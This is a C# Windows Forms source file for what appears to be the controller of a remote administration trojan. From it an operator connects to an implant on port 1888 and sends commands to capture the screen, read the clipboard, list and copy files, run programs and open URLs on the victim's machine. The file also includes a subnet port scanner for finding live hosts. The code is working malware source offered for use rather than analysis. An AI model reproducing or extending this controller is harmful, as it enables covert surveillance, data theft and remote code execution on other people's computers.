using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using System.IO;
using Microsoft.VisualBasic;


namespace Client
{
    public partial class Form1 : Form
    {
        private TcpClient tcpC = null;
        private TcpClient newtcpC = null;
        private NetworkStream netStream = null;
        private Int32 port = 1888;
        private Thread threadMain;
        private string localIP = null;
        private bool showImage = false;
        private string path = null;
        private int done;
        private int total;
        private int needScan;
        private int scanPort;
        
        
        public Form1()
        {
            InitializeComponent();
        }

        private void groupBox1_Enter(object sender, EventArgs e)
        {

        }

        private void groupBox5_Enter(object sender, EventArgs e)
        {

        }

        private void Form1_Load(object sender, EventArgs e)
        {

            IPHostEntry myHost = new IPHostEntry();
            myHost = Dns.GetHostByName(Dns.GetHostName());
            localIP = myHost.AddressList[0].ToString();
            this.Text = "Client -> " + localIP;
        }

        private void btn_connect_Click(object sender, EventArgs e)
        {
            try
            {
                tcpC = new TcpClient();
                tcpC.Connect(tbox_ip.Text, port);
                this.Text = "Connected to :" + tbox_ip.Text;
                rtbox_show.Text = "";
            }
            catch (Exception ee)
            {
                rtbox_show.AppendText(ee.Message + "\r\n");
                return;
            }

            btn_connect.Enabled = false;
            threadMain = new Thread(new ThreadStart(receive));
            threadMain.IsBackground = true;
            threadMain.Start();
        }

        private void receive()
            {
                while(true)
                {
                    netStream = tcpC.GetStream();
                    byte [] byteData = new byte[1024];
                    netStream.Read(byteData,0,byteData.Length);
                    string msg = System.Text.Encoding.UTF8.GetString(byteData);
                    rtbox_show.Text="";
                    rtbox_show.AppendText(msg);
                }
            }

        private void btn_stop_Click(object sender, EventArgs e)
        {
            try
            {
                threadMain.Abort();
                netStream.Close();
                tcpC.Close();
                rtbox_show.Text="";
                rtbox_show.AppendText("Disconnected");
                btn_connect.Enabled=true;
                this.Text="Client -> "+localIP;
            }catch
            {
                MessageBox.Show("Don't Connect");
            }
        }

        private void sendToServer(string sendData)
        {
            try
            {
                sendData = sendData + "\r\n";
                byte[] byteData = System.Text.Encoding.UTF8.GetBytes(
                    sendData.ToCharArray()
                );
                netStream.Write(byteData, 0, byteData.Length);
                netStream.Flush();

                //netStream.Read(byteData, 0, 1);


            }
            catch
            {
                MessageBox.Show("Fiale to Connect");
            }
        }

        private void btn_message_Click(object sender, EventArgs e)
        {
            sendToServer("msg" + " " + tbox_msg.Text);
        }

        private void btn_cd_Click(object sender, EventArgs e)
        {
            sendToServer("cdcontrol");
        }

        private void btn_driver_Click(object sender, EventArgs e)
        {
            sendToServer("driverinfo");
        }

        private void btn_screen_Click(object sender, EventArgs e)
        {
            showImage = true;
            sendToServer("getScreen");
            Thread.Sleep(5000);
            path = "C:\\screen.jpg";
            Thread t = new Thread(new ThreadStart(getFile));
            t.IsBackground = true;
            t.Start();
        }

        private void btn_clip_Click(object sender, EventArgs e)
        {
            sendToServer("getcliptext");
        }

        private void btn_ver_Click(object sender, EventArgs e)
        {
            sendToServer("winversion");
        }

        private void button12_Click(object sender, EventArgs e)
        {
            string command = "";
            string para = tbox_filePath.Text;
            if (rbtn_list.Checked)
            {
                command = "list";
                sendToServer(command + " " + para);
            }
            if (rbtn_del.Checked)
            {
                //command = "del";
                //sendToServer(command + " " + para);
            }
            if (rbtn_copy.Checked)
            {
                command = "copy";
                sendToServer(command + " " + para);
                path = Interaction.InputBox(
                    "Enter a path stored fiel",
                    "", "", -1, -1);
                Thread t = new Thread(new ThreadStart(getFile));
                t.IsBackground = true;
                t.Start();

            }
        }

        private void btn_run_Click(object sender, EventArgs e)
        {
            sendToServer("run" + " " + tbox_runPath.Text);
        }

        private void btn_url_Click(object sender, EventArgs e)
        {
            sendToServer("url" + " " + tbox_url.Text);
        }

        private void getFile()
        {
            int port = Int32.Parse(tbox_port.Text) + 1;
            newtcpC = new TcpClient();
            try
            {
                newtcpC.Connect(tbox_ip.Text, port);
                NetworkStream netStream_n = newtcpC.GetStream();
                FileStream fs = new FileStream(path,
                                        FileMode.OpenOrCreate,
                                        FileAccess.Write);
                byte[] bb = new byte[8];
                while (netStream_n.Read(bb, 0, bb.Length) != 0)
                {
                    fs.Write(bb, 0, bb.Length);
                    fs.Flush();
                }
                fs.Close();
                netStream_n.Close();
                if (showImage)
                {
                    System.Diagnostics.Process.Start(path);
                    showImage = false;
                }
            }
            catch
            {
                MessageBox.Show("Port" + port + " Can't");
            }
        }

        private void btn_scan_Click(object sender, EventArgs e)
        {
            done = 0;
            total = 0;
            needScan = 0;
            rtbox_show.Text = "";
            string scanIP = tbox_from.Text.Trim();
            if (scanIP == "") return;
            string[] cutIP = scanIP.Split('.');
            scanIP = cutIP[0] + "." + cutIP[1] + "." + cutIP[2] + ".";
            Int32 lastIP = Int32.Parse(cutIP[3]);
            needScan = 255 - lastIP;
            if (lastIP == 0 || lastIP >= 255) return;
            string currentIP = "";
            scanPort = Int32.Parse(tbox_scanPort.Text.Trim());
            for (Int32 i = lastIP; i < 255; i++)
            {
                currentIP = scanIP + i.ToString();
                ThreadPool.QueueUserWorkItem(new WaitCallback(myScan),currentIP);
            }
        }

        private void myScan(Object obj)
        {
            tbox_state.Text = done.ToString() + " / " + total.ToString();
            string target = (string)obj;
            total += 1;
            try
            {
                TcpClient tcpScan = new TcpClient();
                tcpScan.Connect(target, scanPort);
                rtbox_show.AppendText(target + " [alive]\r\n");
                tcpScan.Close();
                done += 1;
            }
            catch
            {
            }
            finally
            {
                Thread.Sleep(0);
                if (needScan == total) tbox_state.Text = "Finished";
            }
        }

        private void rbtn_del_CheckedChanged(object sender, EventArgs e)
        {

        }

        private void tbox_from_TextChanged(object sender, EventArgs e)
        {

        }

        private void groupBox4_Enter(object sender, EventArgs e)
        {

        }

    }
}